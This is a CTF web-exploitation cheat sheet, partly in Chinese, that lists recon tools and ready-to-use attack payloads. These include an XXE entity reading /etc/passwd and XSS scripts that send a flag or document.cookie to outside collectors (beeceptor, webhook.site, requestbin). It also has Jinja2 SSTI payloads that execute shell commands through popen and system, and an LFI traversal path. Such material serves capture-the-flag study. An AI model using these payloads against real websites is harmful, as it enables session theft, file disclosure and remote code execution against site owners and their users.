Web Cheat Sheet

解題重點

robots.txt
掃port: nmap: $ sudo apt install net-toolsNMAP教學
- nmap: $ nmap <url>
封包headers和contents: Wireshark、Browser、BurpSuite
cookies
Information Leak
- .DS_Store: lijiejie/ds_store_exp
- gitleak: denny0223/scrabble

Injection

SQLi

XXE

  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
      <data><ID>&xxe;</ID></data>

XSS

  </script><script>
  fetch(`/getflag\)
      .then(r=>r.text())
      .then(flag=>location.href=`https://sbk6401.free.beeceptor.com/?f=${flag}`
      )
  </script>

Command Injection - feifei Cheat Sheet

其他

LFI: ../../../flag.txt
Deserialization
前端
SSRF
上傳
如果是WordPress網頁: WpScan專門檢測WordPress類型的網頁，有哪些漏洞，前期可以掃描出WP版本、安裝的theme或是插件有哪些、安全漏洞等等

Online Tools

Fuck	Beautifier
jsfuck	JSNice
jjencode	JS 反混淆器: 可以反混淆或解密JS的檔案
aaencode	JS 壓縮+加密+混淆+美化
Esolang List	JS Fuck Decode
	aadecode

Cheat-Sheet

XSS-CheatSheet 利用XSS把session打到webhook上:

  window.location=<requestbin.com>/?a+document.cookie
  // or
  fetch("https://webhook.site/699a6563-c9b5-4ad7-adaa-e189c5f78194", { method: 'GET', headers: { 'Cookie': document.cookie } })

All-Injection

SSTI Payload: 記得找os._wrap_close

  {{().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('id')}}
  {{self.__init__.__globals__.__builtins__.__import__("os").popen("cat%20Flag.txt").read()}}
  {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['execl']("/bin/cat", "cat", "./flag.txt")}}
  {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']("cat /flag.txt")}}
  {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['execl']("/bin/cat", "cat", file.lower())}}
  {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['spawnl']('P_WAIT', "/bin/cat", "cat", file.lower())}}

Others

wasm → c: wabt

  # 安裝Cmake，所有過程一定要用WSL
  $ mkdir build && cd build
  $ cmake ..
  $ cmake --build .
  # 按照說明build完後進到./build
  $ ./wasm2c {wasm file path} -o {output c file path}

Webhook Webhook.site Beeceptor Ngrok